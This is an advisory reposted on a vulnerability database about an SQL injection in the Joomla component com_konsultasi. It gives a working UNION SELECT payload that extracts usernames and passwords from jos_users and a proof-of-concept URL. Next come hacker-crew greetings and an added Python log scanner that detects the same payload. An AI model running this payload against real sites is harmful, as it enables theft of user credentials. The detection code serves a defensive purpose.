Joomla Component com_konsultasi (sid) SQL Injection Vulnerability

2010.05.29
Credit: c4uR
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------------------------------
Joomla Component com_konsultasi (sid) SQL Injection Vulnerability
-------------------------------------------------------------------------
Author : c4uR
Date : May, 13, 2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
-------------------------------------------------------------------------
Exploit :
----------
-5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--

SQLi p0c :
-----------
http://127.0.0.1/[gubrak]/index.php?option=com_konsultasi&act=detail&sid=[gubrak]
-------------------------------------------------------------------------
crott :
-----------
[+] Malingsial underpants, crott... crott... crott...
[+] tian (keep your hands from being naughty) + GheMaX (eat a lot, so there is something in you) + xx_user + ChuCu + JaLi-
[+] m0n0n, the camera lovers (1214n, v4lc0m87, astroboyyy, aldy182)
[+] naughty old kids (mbah l4mpor, awchoy)
[+] flyff666 (a hacker, yet his cigarettes are Djarum Super. hahaha)
[+] cruz3N (stop playing with the soap all the time, dude) + petimati (grabs anyone's cigarettes, hahaha)
[+] spykit-hendri note (you two, don't keep fighting, get along..)
[+] v3n0m (hopeless, still hasn't even found a boarding room, hahaha)
[+] koh wisdom (always smoking) + blue screen, skutengboy (you two are a well-matched couple, hahaha)
[+] uzanc (lame, how come you didn't make one for me) + jhony ramsoy (if you get married, invite me)
[+] kiddies + om whitehat + chaer + om xadpritox
[+] K9 + atom + legion (Good Job + you best cracker... hashkiller)
[+] amel bauell, never dies...
[+] Apartement Griya Semanggi + poinsonV
[+] Indonesia never dies, even though it is sometimes gloomy
-------------------------------------------------------------------------
contact :
-----------
- qinoryy@yahoo.com
- #devilzc0de @irc.dal.net
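An added detection example (not part of the original advisory or the component's code): it scans web access-log lines for com_konsultasi requests whose sid is not a plain integer, and replaces /**/ comments with spaces so the UNION SELECT in the payload above is recognized. The log format, the sample lines and the assumption that sid is a numeric record id are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IPs, not real traffic).
# The second line carries the payload quoted in the advisory above.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/May/2010:10:00:01 +0700] "GET /index.php?option=com_konsultasi&act=detail&sid=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [13/May/2010:10:00:05 +0700] "GET /index.php?option=com_konsultasi&act=detail&sid=-5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users-- HTTP/1.1" 200 6033',
    '198.51.100.9 - - [13/May/2010:10:00:09 +0700] "GET /index.php?option=com_konsultasi&act=detail&sid=3%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 6033',
    '198.51.100.7 - - [13/May/2010:10:00:12 +0700] "GET /index.php?option=com_konsultasi&act=detail&sid=12abc HTTP/1.1" 200 5120',
    '198.51.100.8 - - [13/May/2010:10:00:15 +0700] "GET /index.php?option=com_content&view=article&id=4 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)  # inline /* ... */ comments
UNION_SELECT_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)


def inspect_line(line):
    """Return a finding dict for a suspicious com_konsultasi request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    # parse_qs percent-decodes values, so encoded separators are seen in clear.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if query.get("option", [""])[0].lower() != "com_konsultasi":
        return None
    for sid in query.get("sid", []):
        # Assumption: a legitimate sid is a plain non-negative integer id.
        if sid.isascii() and sid.isdigit():
            continue
        # /**/ stands in for whitespace, so replace comments with a space.
        normalized = SQL_COMMENT_RE.sub(" ", sid)
        return {
            "client": line.split()[0],
            "sid": sid,
            "union_select": bool(UNION_SELECT_RE.search(normalized)),
        }
    return None


def scan(lines):
    """Return findings for every flagged line, in input order."""
    return [f for f in map(inspect_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The integer allow-list is the primary signal; the union_select flag only classifies what was caught, and a whitespace-based pattern applied to the raw value would miss the comment-separated form.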

References:

http://xforce.iss.net/xforce/xfdb/58584
http://www.securityfocus.com/bid/40160
http://www.exploit-db.com/exploits/12590
http://secunia.com/advisories/39816
http://packetstormsecurity.org/1005-exploits/joomlakonsultasi-sql.txt
http://osvdb.org/64637


Copyright 2024, cxsecurity.com

 
